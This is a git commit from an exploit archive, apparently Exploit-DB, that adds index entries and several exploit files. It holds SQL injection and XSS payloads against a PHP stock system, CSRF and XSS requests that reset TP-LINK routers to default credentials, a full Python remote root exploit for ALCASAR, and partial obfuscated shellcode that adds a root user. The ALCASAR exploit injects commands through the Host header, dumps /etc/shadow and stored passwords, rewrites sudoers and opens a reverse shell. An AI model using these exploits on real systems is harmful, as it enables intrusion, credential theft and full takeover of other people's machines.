Updated 09_11_2014

This commit is contained in:
Offensive Security 2014-09-11 04:44:07 +00:00
parent 38f34a5333
commit afeaf30889
19 changed files with 3024 additions and 1 deletions

View file

@ -3143,7 +3143,7 @@ id,file,description,date,author,platform,type,port
3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 (AdminBlogNewsEdit.asp) Remote Auth Bypass Vuln",2007-03-15,WiLdBoY,asp,webapps,0
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21
3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0
3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure Vulnerability",2007-03-15,Dj7xpl,php,webapps,0
3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability",2007-03-15,the_day,php,webapps,0
@ -31137,5 +31137,23 @@ id,file,description,date,author,platform,type,port
34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0
34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80
34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross Site Scripting",2014-09-08,smash,php,webapps,80
34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80
34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80
34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443
34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0
34598,platforms/php/webapps/34598.txt,"SZNews 2.7 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0
34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection Vulnerabilities",2009-09-10,Mr.SQL,php,webapps,0
34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0

Can't render this file because it is too large.

189
platforms/aix/dos/34588.txt Executable file
View file

@ -0,0 +1,189 @@
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
?# Vendor Homepage: ?http://www.posnic.com/?
# Software Link:? http://sourceforge.net/projects/stockmanagement/
# Version: ?1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
#########################################################################################################
XSS install.php
code :
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
#########################################################################################################
SQL INJECTION : stock.php
code :
include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";
}
}
exploit :
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
#########################################################################################################
SQL INJECTION : view_customers.php
code :
$SQL = "SELECT * FROM customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
POST
searchtxt=1(inject)&Search=Search
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
SQL INJECTION : view_product.php
code :
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}
$page = $_GET['page'];
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
else
$start = 0; //if no page var is given, set start to 0
/* Get data. */
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
}
$result = mysql_query($sql);
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
#########################################################################################################
UPLOAD : logo_set.php
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
AND MORE BUGS
Bye
#########################################################################################################
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
sec4ever.com & alm3refh.com
#########################################################################################################

View file

@ -0,0 +1,183 @@
#Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
#Date: 01.07.14
#Vendor: TP-LINK
#Affected versions: TL-WR340G/TL-WR340GD
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
#Contact: smash [at] devilteam.pl
Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
Config file - 192.168.1.1/userRpm/config.bin
#1 - Cross Site Scripting
a) Persistent XSS in Network > WAN Settings
Vulnerable parameter - hostName.
Request:
GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var dhcpInf = new Array(
1,
(...)
"</script><script>alert(123)</script>",
0,0 );
</SCRIPT>
(...)
b) Persitent XSS in Wireless Settings
Vulnerable parameter - ssid.
Request:
GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
0,0 );
</SCRIPT>
(...)
c) Persistent XSS in DHCP Settings
Vulnerable parameter - domain.
Request:
GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var DHCPPara = new Array(
1,
"192.168.1.100",
"192.168.1.199",
120,
"0.0.0.0",
"</script><xssed>'\"",
"0.0.0.0",
"0.0.0.0",
1,
1,
0,0 );
</SCRIPT>
(...)
d) Persitent XSS in Security > Domain Filtering
Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
Request:
GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var domainFilterList = new Array(
"0000-2400", "hm</script><xssed>'\"", 1,
0,0 );
</SCRIPT>
(...)
e) Persistent XSS in Dynamic DNS Settings
Vulnerable parameters - username & cliUrl.
Request:
GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var serInf = new Array(
"",
"",
"</script><script>alert(123)</script>",
0,
0,
2,
2,
0,
1,
0,0 );
</SCRIPT>
(...)
#2 - CSRF
a) Change LAN IP
Parameter lanip stands for further ip.
GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
Host: 192.168.1.1
b) Change remote managment settings
GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
c) Clear syslog
GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
Host: 192.168.1.1
d) Reboot device
GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
Host: 192.168.1.1
e) Restore factory defaults (admin:admin)
GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
Host: 192.168.1

View file

@ -0,0 +1,194 @@
#Title: TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
#Date: 30.06.14
#Vendor: TP-LINK
#Affected versions: TL-WR841N / TL-WR841ND
#Tested on: Firmware Version - 3.13.27 Build 121101 Rel.38183n, Hardware Version - WR841N v8 00000000 [at] Linux
#Contact: smash [at] devilteam.pl
#1 - Reflected XSS in Wireless Settings
Vulnerable parameters - ssid1, ssid2, ssid3, ssid4.
Variables of ssid parameters are being included to wlanPara array. Because of poor filtration of those values, it is able to execute specific javascript command as shown below.
While system log and config is being saved as local file (http://192.168.0.1/userRpm/SystemLog.txt & http://192.168.0.1/userRpm/config.bin), it is able to hjiack both via xss.
Request:
http://192.168.0.1/userRpm/WlanNetworkRpm.htm?ssid1=ROUTERNAME</script><script>alert(123)</script>&ssid2=ROUTERNAME_2&ssid3=ROUTERNAME_3&ssid4=ROUTERNAME_4®ion=101&band=0&mode=5&chanWidth=2&channel=15&rate=71&ap=1&broadcast=2&brlssid=&brlbssid=&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save
Response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
(...)
<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
0,8,0,"ROUTERNAME</script><script>alert(123)</script>",108,101,1,5,1,1,15,2,71,0,0,0,"cript>","ROUTERNAME_3","ROUTERNAME_4",691810163,0,0,0,"","",1,"",1,1,3,3,0,1,1,36,0,0,"","","","","","","","",1,"",0,"","",1,0,0,1,0,1,0,0 );
</SCRIPT>
#2 - Persistent XSS & CSRF in Wireless Security Settings
Vulnerable parameter - pskSecret.
Same as above, variable of pskSecret (password) is being included in javascript array. Because of no CSRF prevention, it is able to change the password by visiting url below. pskSecret value is responsible for further password.
Request:
http://192.168.0.1/userRpm/WlanSecurityRpm.htm?secType=3&pskSecOpt=2&pskCipher=3&pskSecret=test&interval=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=0&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save
Response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
8, 1, 3, "332", 1, 0, "", 1812, "", "</script><script>alert(123)</script>", 1, 0, 0, 1, 3, 0, 0, 0, 5, 0, 1, "", 1,
0,0 );
</SCRIPT>
#3 - Persistent XSS & CSRF in Mail Settings
Vulnerable parameters - FromAddr, ToAddr, SMTPAddr.
Reason is the same.
Request:
http://192.168.0.1/userRpm/AutoEmailRpm.htm?FromAddr=test%40test.com&ToAddr=test1%40test.com&SMTPAddr=</script><script>alert(123)</script>&User=&Password=&VeriPass=&Save=Save
Response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
<SCRIPT language="javascript" type="text/javascript">
var autoEmailConf = new Array(
"test@test.com",
"test1@test.com",
"</script><script>alert(123)</script>",
0,
"",
0,
0,
0,
0,
0,0 );
</SCRIPT>
It is able to steal system logs by forcing our victim to set our mail settings via csrf, then logs will be send after visiting address below:
http://192.168.0.1/userRpm/SystemLogRpm.htm?doMailLog=2
#4 - Persistent XSS & CSRF in Time Settings
Vulnerable parameters - ntpA & ntpB.
Request:
http://192.168.0.1/userRpm/DateTimeCfgRpm.htm?timezone=0&month=7&day=1&year=2014&hour=2&minute=44&second=18&ntpA=</script><script>xssed<>&ntpB=&isTimeChanged=0&start_month=0&start_count=0&start_week=1&start_hour=0&end_month=0&end_count=0&end_week=1&end_hour=0&isDaylightSavingChanged=0&Save=Save
Response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
<SCRIPT language="javascript" type="text/javascript">
var timeInf = new Array(
7,
1,
2014,
2,
58,
52,
0,
"</script>xssed<>",
"0.0.0.0",
2,
2,
0,
2,
10,
1,
0,
3,
0,
0,
0,0 );
</SCRIPT>
#5 - Persistent XSS & CSRF in Dynamic DNS settings
Vulnerable parameters - username, password, cliUrl.
Request:
http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=</script><script>alert(123)</script>&pwd=password&cliUrl=&Save=Save
Response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
<SCRIPT language="javascript" type="text/javascript">
var serInf = new Array(
"</script><script>alert(123)</script>",
"password",
"",
0,
0,
3,
2,
0,
1,
0,0 );
</SCRIPT>
#6 - Persistent XSS & CSRF in DHCP settings
Vulnerable parameter - domain.
Request:
http://192.168.0.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&gateway=192.168.0.1&domain=</script>xssed<>&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save
Response:
HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless N Router WR841N"
<SCRIPT language="javascript" type="text/javascript">
var DHCPPara = new Array(
1,
"192.168.0.100",
"192.168.0.199",
120,
"192.168.0.1",
"</script>xssed<>",
"0.0.0.0",
"0.0.0.0",
1,
0,0 );
</SCRIPT>
#7 - Other CSRF's
a) Clear system logs
http://192.168.0.1/userRpm/SystemLogRpm.htm?logType=0&logLevel=7&ClearLog=Clear+Log&selPage=1&Page=1
b) Reboot device
http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reboot
c) Factory defaults reset (admin:admin)
http://192.168.0.1/userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore
Actually, there is no prevention technique to avoid csrf in this one; bug's pointed above are most interesting.

213
platforms/linux/remote/34595.py Executable file
View file

@ -0,0 +1,213 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
####
#
# ALCASAR <= 2.8 Remote Root Code Execution Vulnerability
#
# Author: eF
# Date : 2014-02-10
#
#
# db 88 ,ad8888ba, db ad88888ba db 88888888ba
# d88b 88 d8"' `"8b d88b d8" "8b d88b 88 "8b
# d8'`8b 88 d8' d8'`8b Y8, d8'`8b 88 ,8P
# d8' `8b 88 88 d8' `8b `Y8aaaaa, d8' `8b 88aaaaaa8P'
# d8YaaaaY8b 88 88 d8YaaaaY8b `"""""8b, d8YaaaaY8b 88""""88'
# d8""""""""8b 88 Y8, d8""""""""8b `8b d8""""""""8b 88 `8b
# d8' `8b 88 Y8a. .a8P d8' `8b Y8a a8P d8' `8b 88 `8b
# d8' `8b 88888888888 `"Y8888Y"' d8' `8b "Y88888P" d8' `8b 88 `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet
# consultation networks. It authenticates, attributes and protects users'
# access regardless their connected equipment (PC, Pokédex, game console,
# etc.).
#
#
# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a
# trivial vulnerability. In the "index.php" file:
#
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
#
# By sending a specially crafted value in the "host" HTTP header, it is possible
# to inject the exec() function in order to execute commands as Apache user.
#
# In addition, the Apache user is able to call sudo for these binaries:
#
# /sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
# /usr/local/bin/alcasar-conf.sh
# /usr/local/sbin/alcasar-mysql.sh
# /usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
# /usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
# /usr/local/bin/alcasar-archive.sh
# /usr/bin/radwho,/usr/sbin/chilli_query
# /usr/local/sbin/alcasar-logout.sh
# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
# /usr/bin/openssl
#
# As a result, we can use /usr/bin/openssl to read a file as root:
#
# sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
#
# Or to create or overwrite files as root (create a cron job, edit /etc/sudoers, etc.):
#
# echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
#
# In this exploit, I choose to modify the "sudoers" file.
#
# Note: this vulnerability has been discovered in less than 30 seconds.
# Others vulnerabilities are still present. This code has never been audited...
# The PHP code is dreadful and needs to be rewritten from scratch.
#
# Example (post-auth) in file acc/admin/activity.php:
#
# if (isset($_POST['action'])){
# switch ($_POST['action']){
# case 'user_disconnect' :
# exec ("sudo /usr/sbin/chilli_query logout $_POST[mac_addr]");
#
#
# This is not a responsible disclosure coz' I have no sense of ethics and I couldn't care less.
#
#
# % python alcasar-2.8_rce.py alcasar.localdomain "alcasar-version.sh"
#
# [+] Hello, first here are some passwords for you:
# Password to protect the boot menu (GRUB) : cV9eEz1g
# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
# Name and password of Mysql/mariadb user : radius / oRNln64j
# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
#
# root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:99999:7:::
#
# [...]
#
# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
#
# username value
# user $1$passwd$qr0Ajhr12fZ475a2qAZ.H.
#
# [-] whoami (should be apache):
# uid=495(apache) gid=492(apache) groups=492(apache)
#
# [+] On the way to the uid 0...
# [-] Got root?
# uid=0(root) gid=0(root) groups=0(root)
#
# [+] Your command Sir:
# The Running version (2.8) is up to date
#
#
####
import sys, os, re, httplib
class PWN_Alcasar:
def __init__(self, host):
self.host = host
self.root = False
def exec_cmd(self, cmd, output=False):
tag = os.urandom(4).encode('hex')
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
if self.root:
cmd = 'sudo %s' % cmd
headers = {
'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 -w0;#' % (tag, cmd.encode('base64').replace('\n',''))
}
c = httplib.HTTPConnection(self.host)
c.request('GET', '/index.php', '', headers)
r = c.getresponse()
data = r.read()
c.close()
if data.find(tag) != -1:
m = re.search(r'%s, (.*)\s</div>' % tag, data)
if m:
data = m.group(1).decode('base64')
if output:
print data
return data
return None
def read_file(self, filepath, output=True):
return self.exec_cmd('sudo openssl base64 -in %s -A|base64 -d' % filepath, output=output)
def read_passwords(self):
self.read_file('/root/ALCASAR-passwords.txt')
self.read_file('/etc/shadow')
self.read_file('/usr/local/etc/digest/key_all')
self.read_file('/usr/local/etc/digest/key_admin')
self.read_file('/usr/local/etc/digest/key_backup')
self.read_file('/usr/local/etc/digest/key_manager')
self.read_file('/usr/local/etc/digest/key_only_admin')
self.read_file('/usr/local/etc/digest/key_only_backup')
self.read_file('/usr/local/etc/digest/key_only_manager')
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
if alcasar_mysql:
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
if m:
radiuspwd = m.group(1)
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
def edit_sudoers(self):
self.exec_cmd('sudo openssl base64 -in /etc/sudoers -out /tmp/sudoers.b64')
self.exec_cmd('openssl base64 -d -in /tmp/sudoers.b64 -out /tmp/sudoers')
self.exec_cmd('sed -i s/BL,NF/BL,ALL,NF/g /tmp/sudoers')
self.exec_cmd('sudo openssl base64 -in /tmp/sudoers -out /tmp/sudoers.b64')
self.exec_cmd('sudo openssl base64 -d -in /tmp/sudoers.b64 -out /etc/sudoers')
self.exec_cmd('sudo rm -f /tmp/sudoers*')
self.root = True
def reverse_shell(self, rip, rport='80'):
payload = 'import socket,subprocess,os;'
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
payload += 's.connect((\'%s\',%s));' % (rip, rport)
payload += 'os.dup2(s.fileno(),0);'
payload += 'os.dup2(s.fileno(),1);'
payload += 'os.dup2(s.fileno(),2);'
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
return self.exec_cmd('python -c "%s"' % payload)
def usage():
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
print ' "command" can be a shell command or "reverseshell"'
sys.exit(0)
if __name__ == '__main__':
if len(sys.argv) < 3:
usage()
cmd = sys.argv[2]
if cmd == 'reverseshell':
if len(sys.argv) < 5:
print '[!] Need IP and port for the reverse shell...'
sys.exit(0)
rip = sys.argv[3]
rport = sys.argv[4] # 80 is a good one...
exploit = PWN_Alcasar(sys.argv[1])
print '[+] Hello, first here are some passwords for you:'
exploit.read_passwords()
print '[-] whoami (should be apache):'
exploit.exec_cmd('id', output=True)
print '[+] On the way to the uid 0...'
exploit.edit_sudoers()
print '[-] Got root?'
exploit.exec_cmd('id', output=True)
if cmd == 'reverseshell':
print '[+] You should now have a shell on %s:%s' % (rip, rport)
exploit.reverse_shell(rip, rport)
else:
print '[+] Your command Sir:'
exploit.exec_cmd(cmd, output=True)
sys.exit(1)

209
platforms/linux/shellcode/34592.c Executable file
View file

@ -0,0 +1,209 @@
/*
#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
#length: 521 bytes
#Date: 8 September 2018
#Author: Ali Razmjoo
#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Thanks to Jonathan Salwan
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
d: ba 33 36 38 37 mov $0x37383633,%edx
12: 31 d3 xor %edx,%ebx
14: 53 push %ebx
15: c1 eb 08 shr $0x8,%ebx
18: 53 push %ebx
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
1e: ba 55 36 38 36 mov $0x36383655,%edx
23: 31 d3 xor %edx,%ebx
25: 53 push %ebx
26: bb 67 58 45 4e mov $0x4e455867,%ebx
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
30: 31 d3 xor %edx,%ebx
32: 53 push %ebx
33: 89 e3 mov %esp,%ebx
35: 68 41 41 ff 01 push $0x1ff4141
3a: 59 pop %ecx
3b: c1 e9 08 shr $0x8,%ecx
3e: c1 e9 08 shr $0x8,%ecx
41: 6a 0f push $0xf
43: 58 pop %eax
44: cd 80 int $0x80
46: bb 53 49 57 4a mov $0x4a574953,%ebx
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
50: 31 d3 xor %edx,%ebx
52: c1 eb 08 shr $0x8,%ebx
55: 53 push %ebx
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
60: 31 d3 xor %edx,%ebx
62: 53 push %ebx
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
68: ba 41 31 3d 34 mov $0x343d3141,%edx
6d: 31 d3 xor %edx,%ebx
6f: 53 push %ebx
70: 89 e3 mov %esp,%ebx
72: 68 41 41 ff 01 push $0x1ff4141
77: 59 pop %ecx
